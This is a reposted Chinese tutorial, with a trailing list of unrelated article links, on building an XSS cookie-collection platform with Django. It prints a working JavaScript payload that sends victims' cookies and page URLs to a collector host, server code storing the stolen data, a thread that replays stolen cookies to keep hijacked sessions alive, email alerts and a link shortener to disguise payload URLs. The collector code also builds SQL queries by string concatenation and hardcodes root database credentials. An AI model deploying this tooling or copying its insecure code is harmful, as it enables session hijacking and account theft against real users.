编程 Python

使用Django简单编写一个XSS平台的方法步骤

Posted in Python onMarch 25, 2019

1) 简要描述

原理十分简单2333,代码呆萌,大牛勿喷 >_<

2) 基础知识

XSS攻击基本原理和利用方法
Django框架的使用

3) Let's start

0x01

工欲善其事必先利其器，首先我们需要准备编写代码的各种工具和环境，这里不细说。我这里的环境和工具如下：

python 3.7.0
pycharm
windows 10
mysql 8.0.15
Django 2.1.3

需要用到的第三方库：

django
pymysql
requests

0x02

我们先看一下XSS脚本是如何工作的

var website = "http://127.0.0.1"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() {
    try {
      return document.location.href
    } catch(e) {
      return ''
    }
  })()) + '&toplocation=' + escape((function() {
    try {
      return top.location.href
    } catch(e) {
      return ''
    }
  })()) + '&cookie=' + escape((function() {
    try {
      return document.cookie
    } catch(e) {
      return ''
    }
  })()) + '&opener=' + escape((function() {
    try {
      return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
    } catch(e) {
      return ''
    }
  })());
})();

这段代码非常简单，就是通过javascript获取有用信息，然后通过访问xss平台将信息作为GET参数传给服务器。

注意：这里使用AJAX可能会出现CORS跨域问题。

0x03

先给出关键代码，其他都是Django相关的内容，这里不做相关讨论。

"""
根据url值动态返回相应的javascript代码
"""
import pymysql,os
from user.safeio import re_check

def get_info(url):
  if not re_check(url,'num_letter'):
    return 'default'
  db = pymysql.connect('localhost','root','root','xss')
  cursor = db.cursor()
  cursor.execute("Select name From projects Where url='"+url+"'")
  js_name = cursor.fetchone()[0]
  if js_name == None:
    return 'default'
  else:
    return (js_name)

def get_js_value(url):
  js_name = get_info(url)
  file = '\\script\\'+js_name + '.js'
  js_value = open(os.getcwd()+file).read()
  js_value = js_value.replace('<-1234->',url)
  return js_value

import pymysql,time
from .getscript import get_info

def connect():
  try:
    db = pymysql.connect('localhost', 'root', 'root', 'xss')
    cursor = db.cursor()
    return db,cursor
  except:
    print('连接数据库失败，正在尝试重新连接')
    connect()

def put_letter(requests,url):
  now_time = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))[2:]
  if 'HTTP_X_FORWARDED_FOR' in requests.META:
    ip = requests.META['HTTP_X_FORWARDED_FOR']
  else:
    try:
      ip = requests.META['REMOTE_ADDR']
    except:
      ip = '0.0.0.0'
  ip = ip.replace("'","\'")
  origin = requests.GET.get('location','Unknown').replace("'","\'")
  software = requests.META.get('HTTP_USER_AGENT','Unknown').replace("'","\'")
  method = requests.method.replace("'","\'")
  data = requests.GET.get('cookie','No data').replace("'","\'")
  keep_alive = requests.GET.get('keepsession','0').replace("'","\'")
  list = [now_time,ip,origin,software,method,data,keep_alive]
  put_mysql(list,url)

def put_mysql(list,url):
  db,cursor = connect()
  name = get_info(url)
  cursor.execute("Select user From projects Where url='"+url+"'")
  user = cursor.fetchone()[0]
  m_query = "INSERT INTO letters(time,name,ip,origin,software,method,data,user,keep_alive) VALUES('{0}','{1}','{2}','{3}','{4}','{5}','{6}','{7}','{8}')"
  m_query = m_query.format(list[0],name,list[1],list[2],list[3],list[4],list[5],user,list[6])
  cursor.execute(m_query)
  db.commit()
  db.close()

def get_letters(username):
  db, cursor = connect()
  m_query = "SELECT * FROM letters WHERE user = '{}'"
  m_query = m_query.format(username)
  cursor.execute(m_query)
  result_list = cursor.fetchall()
  return result_list

既然我们知道了xss脚本会将信息构造通过GET的参数形式传给XSS平台，我们只需在服务器接受数据并保存即可。

0x04

我们可以为我们的平台编写新的功能以完善我们的平台，如邮件提醒，cookie活性保持等

#coding=utf-8

'''
邮件发送
'''

import smtplib
from email.mime.text import MIMEText
from email.utils import formataddr

my_sender='xxxx'
my_pass = 'xxxx'

def send_mail(user_mail):
  try:
    print(user_mail)
    msg=MIMEText('您点的外卖已送达，请登录平台查询','plain','utf-8')
    msg['From']=formataddr(["XSS平台",my_sender])
    msg['To']=formataddr(["顾客",user_mail])
    msg['Subject']="您点的外卖已送达，请登录平台查询"
    server=smtplib.SMTP_SSL("smtp.qq.com", 465)
    server.login(my_sender, my_pass)
    server.sendmail(my_sender,[user_mail,],msg.as_string())
    server.quit()
  except Exception:
    pass

'''

使用独立于主线程的其他线程


来保持通用项目的cookie信息'活性'


默认保持一个小时的活性
'''

import requests,queue,time,pymysql

Cookie_Time = 1

def decrease(time,number):
  if time < number:
    time = '0'+str(time)
  else:
    time = str(time)
  return time

def count_time(now_time):
  global Cookie_Time
  year = int(now_time[0:2])
  month = int(now_time[3:5])
  day = int(now_time[6:8])
  hours = int(now_time[9:11])
  if hours < Cookie_Time:
    if day == 1:
      if month == 1:
        month=12
        year -= 1
      else:
        day=30
        month -= 1
    else:
      day -= 1
      hours += 19
  else:
    hours -= 5
  hours = decrease(hours,10)
  day = decrease(day,10)
  month = decrease(month,10)
  year = decrease(year,10)
  dec_time = ("{0}-{1}-{2} {3}").format(year,month,day,hours) + now_time[11:]
  return dec_time

def create_queue():
  Cookie_queue = queue.Queue()
  now_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))[2:]
  dec_time = count_time(now_time)
  m_query = ("SELECT software,origin,data FROM letters WHERE name='default' and time>'{}' and keep_alive = '1'").format(dec_time)
  db = pymysql.connect('127.0.0.1','root','root','xss')
  cursor = db.cursor()
  cursor.execute(m_query)
  return_list = cursor.fetchall()
  for x in return_list:
    Cookie_queue.put(x)
  return Cookie_queue

def action():
  while True:
    time.sleep(60)
    task_queue = create_queue()
    while not task_queue.empty():
      tasks = task_queue.get()
      url = tasks[1]
      ua = tasks[0]
      cookie = tasks[2]
      headers = {'User-Agent': ua, 'Cookie': cookie}
      try:
        requests.get(url, headers=headers)
      except:
        pass

注意这里需要使用独立于django主线程的子线程，比如我在manager.py里添加了这么一段代码：

import threading
from xssplatform.keep_alive import action

class keep_Thread(threading.Thread):
  def __init__(self):
    super(keep_Thread,self).__init__()
  def run(self):
    action()

if __name__ == '__main__':
  th = keep_Thread()
  th.start()

短链接：

'''
短链接生成
接口c7.gg
'''

import requests,json

Headers = {
  "accept" : "application/json, text/javascript, */*; q=0.01",
  "accept-encoding" : "gzip, deflate, br",
  "accept-language" : "zh-CN,zh;q=0.9,en;q=0.8",
  "content-length" : "53",
  "content-type" : "application/x-www-form-urlencoded; charset=UTF-8",
  "origin" : "https://www.985.so",
  "referer" : "https://www.985.so/",
  "user-agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
}

def url_to_short(url):
  global Headers
  data = {'type':'c7','url':url}
  r = requests.post('https://create.ft12.com/done.php?m=index&a=urlCreate',data=data,headers=Headers)
  list = json.loads(r.text)
  return list['list']

4) 最后

其实看起来高大上的XSS平台原理就那么简单，真正难的部分是关于XSS跨站脚本的编写。

此项目已开源于 Github ，有任何问题可以提交issue，我会在第一时间进行回复。

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持三水点靠木。

使用Django简单编写一个XSS平台的方法步骤

- Author -

Yunen

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

python处理按钮消息的实例详解

Jul 11 Python

使用pycharm生成代码模板的实例

May 23 Python

Python二叉树定义与遍历方法实例分析

May 25 Python

python批量复制图片到另一个文件夹

Sep 17 Python

详解Python下Flask-ApScheduler快速指南

Nov 04 Python

python中pytest收集用例规则与运行指定用例详解

Jun 27 Python

Python 中使用 PyMySQL模块操作数据库的方法

Nov 10 Python

pytorch梯度剪裁方式

Feb 04 Python

Python sqlite3查询操作过程解析

Feb 20 Python

python3.9.1环境安装的方法(图文)

Feb 02 Python

在Python 中将类对象序列化为JSON

Apr 06 Python

python中pymysql包操作数据库方法

Apr 19 Python

Python for循环与range函数的使用详解

Mar 23 #Python

详解Python读取yaml文件多层菜单

Mar 23 #Python

详解Python数据分析--Pandas知识点

Mar 23 #Python

详解Python基础random模块随机数的生成

Mar 23 #Python

Python基本数据结构与用法详解【列表、元组、集合、字典】

Mar 23 #Python

Django异步任务之Celery的基本使用

Mar 23 #Python

深入解析Python小白学习【操作列表】

Mar 23 #Python

You might like

PHP+Mysql+jQuery实现动态展示信息

2011/10/08 PHP

一个简洁的PHP可逆加密函数(分享)

2013/06/06 PHP

php自动加载机制的深入分析

2013/06/08 PHP

php上传文件中文文件名乱码的解决方法

2013/11/01 PHP

PHP 获取客户端 IP 地址的方法实例代码

2018/11/11 PHP

如何在标题栏显示框架内页面的标题

2007/02/03 Javascript

深入剖析JavaScript中的枚举功能

2014/03/06 Javascript

jQuery实现ichat在线客服插件

2014/12/29 Javascript

JavaScript数组随机排列实现随机洗牌功能

2015/03/19 Javascript

window.location.reload 刷新使用分析(去对话框)

2015/11/11 Javascript

详解RequireJS按需加载样式文件

2017/04/12 Javascript

JavaScript禁止微信浏览器下拉回弹效果

2017/05/16 Javascript

信息滚动效果的实例讲解

2017/09/18 Javascript

React从react-router路由上做登陆验证控制的方法

2018/05/10 Javascript

解决淘宝cnpm 安装后cnpm不是内部或外部命令的问题

2018/05/17 Javascript

jQuery 实现批量提交表格多行数据的方法

2018/08/09 jQuery

layui 数据表格复选框实现单选功能的例子

2019/09/19 Javascript

微信小程序自定义扫码功能界面的实现代码

2020/07/02 Javascript

[43:48]Ti4正赛第一天 VG vs NEWBEE 2

2014/07/19 DOTA

[02:18]《我与DAC》之工作人员：为了热爱DOTA2的玩家们

2018/03/28 DOTA

Python中列表元素转为数字的方法分析

2016/06/14 Python

Python自定义主从分布式架构实例分析

2016/09/19 Python

python在非root权限下的安装方法

2018/01/23 Python

Pycharm设置utf-8自动显示方法

2019/01/17 Python

numpy.transpose()实现数组的转置例子

2019/12/02 Python

基于Tensorflow批量数据的输入实现方式

2020/02/05 Python

keras实现多GPU或指定GPU的使用介绍

2020/06/17 Python

基于Python-turtle库绘制路飞的草帽骷髅旗、美国队长的盾牌、高达的源码

2021/02/18 Python

CSS3教程(10):CSS3 HSL声明设置颜色

2009/04/02 HTML / CSS

基于css3实现漂亮便签样式

2013/03/18 HTML / CSS

纯CSS3绘制打火机动画火焰效果

2016/07/18 HTML / CSS

Vision Directa智利眼镜网：框架眼镜、隐形眼镜和名牌太阳眼镜

2016/11/23 全球购物

Under Armour安德玛法国官网：美国高端运动科技品牌

2018/06/29 全球购物

北京鼎普科技股份有限公司软件测试面试题

2012/04/07 面试题

学校采购员岗位职责

2014/01/02 职场文书

省三好学生申请材料

2014/01/22 职场文书